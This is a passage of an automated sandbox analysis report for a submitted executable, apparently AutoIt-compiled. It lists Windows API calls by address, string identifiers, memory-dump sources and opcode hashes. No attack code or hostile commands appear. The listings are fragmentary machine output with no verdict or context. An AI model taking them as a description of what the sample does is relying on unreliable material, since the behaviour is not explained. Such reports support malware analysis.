• GetPixel.GDI32(00000000,?,?), ref: 0044A21D
• ReleaseDC.USER32(?,00000000), ref: 0044A229
• SetBkColor.GDI32(?,00000000), ref: 0044A24C
• GetSysColor.USER32(00000008), ref: 0044A265
• SetTextColor.GDI32(?,00000000), ref: 0044A270
• SetBkMode.GDI32(?,00000001), ref: 0044A282
• GetStockObject.GDI32(00000005), ref: 0044A28A
Similarity
• API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
• String ID:
• API String ID: 1744303182-0
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
• __mtterm.LIBCMT ref: 00417C34
  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
• TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
• TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
• __init_pointers.LIBCMT ref: 00417CE6
• __calloc_crt.LIBCMT ref: 00417D54
• GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                        • API String ID: 4163708885-3819984048
                                                                                                        • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                        • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                        • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                        • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID:
• String ID: >>>AUTOIT SCRIPT<<<$\
• API String ID: 0-1896584978
• Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
• Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
• Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
• Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: __wcsicoll$IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2485277191-404129466
• Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
• Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
• Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
• Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
APIs
• LoadIconW.USER32(?,00000063), ref: 0045464C
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
• SetWindowTextW.USER32(?,?), ref: 00454678
• GetDlgItem.USER32(?,000003EA), ref: 00454690
• SetWindowTextW.USER32(00000000,?), ref: 00454697
• GetDlgItem.USER32(?,000003E9), ref: 004546A8
• SetWindowTextW.USER32(00000000,?), ref: 004546AF
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
• GetWindowRect.USER32(?,?), ref: 004546F5
• SetWindowTextW.USER32(?,?), ref: 00454765
• GetDesktopWindow.USER32 ref: 0045476F
• GetWindowRect.USER32(00000000), ref: 00454776
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
• GetClientRect.USER32(?,?), ref: 004547D2
• PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
• SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
• Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
• Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
• Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
APIs
• _wcslen.LIBCMT ref: 00464B28
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
• _wcslen.LIBCMT ref: 00464C28
• GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
• _wcslen.LIBCMT ref: 00464CBA
• _wcslen.LIBCMT ref: 00464CD0
• _wcslen.LIBCMT ref: 00464CEF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: _wcslen$Directory$CurrentSystem
• String ID: D
• API String ID: 1914653954-2746444292
• Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
• Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
• Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
• Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
APIs
• _wcsncpy.LIBCMT ref: 0045CE39
• __wsplitpath.LIBCMT ref: 0045CE78
• _wcscat.LIBCMT ref: 0045CE8B
• _wcscat.LIBCMT ref: 0045CE9E
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
• SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
• _wcscpy.LIBCMT ref: 0045CF61
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
• String ID: *.*
• API String ID: 1153243558-438819550
• Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
• Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
• Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
• Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: __wcsicoll
• String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
• API String ID: 3832890014-4202584635
• Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
• Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
• Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
• Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                        • GetFocus.USER32 ref: 0046A0DD
                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost$CtrlFocus
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 1534620443-4108050209
                                                                                                        • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                        • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                        • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                        • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                        APIs
                                                                                                        • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateDestroy
                                                                                                        • String ID: ,$tooltips_class32
                                                                                                        • API String ID: 1109047481-3856767331
                                                                                                        • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                        • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                        • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                        • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                        APIs
                                                                                                        • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                        • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                        • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                        • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                        • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                        • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                        • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                        • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                        • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                        • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 1441871840-4108050209
                                                                                                        • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                        • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                        • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                        • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                        • API String ID: 3631882475-2268648507
                                                                                                        • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                        • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                        • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                        • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                        APIs
                                                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                        • SendMessageW.USER32 ref: 00471740
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                        • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                        • SendMessageW.USER32 ref: 0047184F
                                                                                                        • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                        • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                        • String ID:
                                                                                                        • API String ID: 4116747274-0
                                                                                                        • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                        • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                        • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                        • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                        APIs
                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                        • _wcslen.LIBCMT ref: 00461683
                                                                                                        • __swprintf.LIBCMT ref: 00461721
                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                        • GetParent.USER32(?), ref: 004618C3
                                                                                                        • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                        • String ID: %s%u
                                                                                                        • API String ID: 1899580136-679674701
                                                                                                        • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                        • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                        • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
